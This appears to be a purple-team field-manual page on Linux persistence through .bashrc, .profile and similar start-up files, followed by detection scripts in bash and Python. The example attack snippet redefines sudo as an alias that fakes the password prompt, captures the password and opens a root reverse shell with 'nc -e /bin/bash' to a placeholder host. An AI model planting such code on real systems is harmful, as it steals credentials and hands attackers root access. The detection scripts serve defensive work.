
PTFM

Persistence through .bashrc and .bash_profile

While editing your .bashrc and .bash_profile is a great way to customize your bash experience, these files can also serve as a persistence mechanism for an adversary, because the shell sources them automatically every time it starts. The following files can be used for this persistence mechanism.

/etc/profile
/etc/bash.bashrc
~/.bashrc
~/.bash_profile
~/.profile

You can take the example malicious code below and add it to any of the files listed above to have a bash shell call out to <ip> and <port>. The snippet works by redefining sudo as an alias, so the callout is launched the next time the user runs sudo.

Example Code:

<var>="<.hidden filename> "
 cat << EOF > /tmp/
   alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale  = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc   -e /bin/bash > /dev/null && /usr/bin/sudo -S '
 EOF
 if [ -f ~/.bashrc ]; then
     cat /tmp/ >> ~/.bashrc
 fi
 if [ -f ~/.zshrc ]; then
     cat /tmp/ >> ~/.zshrc
 fi
 rm /tmp/<var>

This can easily be detected by looking in these file locations for any additions or by using the following code to detect changes.

Example Detection Code:

#!/bin/bash
# detect.sh: alert when a shell start-up file was changed in the last $MIN minutes
MIN=30
# -cmin (inode change) and -mmin (content change) are checked; -amin is dropped
# because every new shell reads these files, so access time would fire on each login
MOD=$(find "$HOME/.bashrc" "$HOME/.bash_profile" "$HOME/.profile" "$HOME/.zshrc" \
        /etc/profile /etc/bash.bashrc -maxdepth 0 \
        \( -cmin -"$MIN" -o -mmin -"$MIN" \) 2>/dev/null)
if [ -n "$MOD" ]; then
    # logger records the alert even when cron has no desktop session for notify-send
    logger -p auth.warning "detect.sh: shell start-up file modified: $MOD"
    notify-send -u critical -t 0 -i /usr/share/icons/gnome/32x32/status/dialog-warning.png \
        "Shell start-up file modified: $MOD"
fi

Add a cron job to run the check every 30 minutes, matching MIN (an entry of "30 * * * *" would run only once an hour, at minute 30):

*/30 * * * * /bin/bash /<path>/detect.sh
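As an added defender-side example that is not part of the PTFM post: rather than relying on timestamps alone, this script keeps a SHA-256 baseline of the start-up files listed above and also scans them for the two indicators visible in the page's payload (a redefined sudo alias and nc started with -e). The baseline location ~/.startup-baseline.json and the "init" argument are assumptions.

```python
# Added example (not PTFM's code): SHA-256 baseline plus indicator scan for the files listed above.
import hashlib
import json
import os
import re
import sys

STARTUP_FILES = ["/etc/profile", "/etc/bash.bashrc", "~/.bashrc",
                 "~/.bash_profile", "~/.profile", "~/.zshrc"]  # from the page; "~" expanded at run time
# Indicators from the page's payload: a redefined sudo alias, and nc -e handed a shell.
INDICATORS = [re.compile(r"^\s*alias\s+sudo="), re.compile(r"\bnc\b.*\s-e\s+/bin/")]

def baseline_of(contents):
    """Map path -> SHA-256 hex of its bytes; build this once on a known-good host."""
    return {p: hashlib.sha256(d).hexdigest() for p, d in contents.items()}

def check_content(path, data, baseline):
    """Compare one file's bytes to the baseline and scan its lines; returns [(path, reason)]."""
    findings = []
    if path not in baseline:
        findings.append((path, "not in baseline"))
    elif hashlib.sha256(data).hexdigest() != baseline[path]:
        findings.append((path, "content changed since baseline"))
    for n, line in enumerate(data.decode(errors="replace").splitlines(), 1):
        if any(rx.search(line) for rx in INDICATORS):
            findings.append((path, f"suspicious line {n}: {line.strip()[:60]}"))
    return findings

def check_files(paths, baseline):  # on-disk wrapper; also flags baselined files that vanished
    findings = []
    for p in paths:
        if os.path.isfile(p):
            with open(p, "rb") as f:
                findings += check_content(p, f.read(), baseline)
        elif p in baseline:
            findings.append((p, "baselined file removed"))
    return findings

if __name__ == "__main__":  # "detect.py init" writes the baseline; "detect.py" checks against it
    paths = [os.path.expanduser(p) for p in STARTUP_FILES]
    bfile = os.path.expanduser("~/.startup-baseline.json")  # assumed location for the baseline
    if sys.argv[1:] == ["init"]:
        present = {p: open(p, "rb").read() for p in paths if os.path.isfile(p)}
        with open(bfile, "w") as f:
            json.dump(baseline_of(present), f)
    else:
        with open(bfile) as f:
            baseline = json.load(f)
        for path, reason in check_files(paths, baseline):
            print(f"ALERT {path}: {reason}")
```

Run it from the same cron entry as detect.sh; a hash mismatch catches an appended alias even when the file's timestamps look untouched.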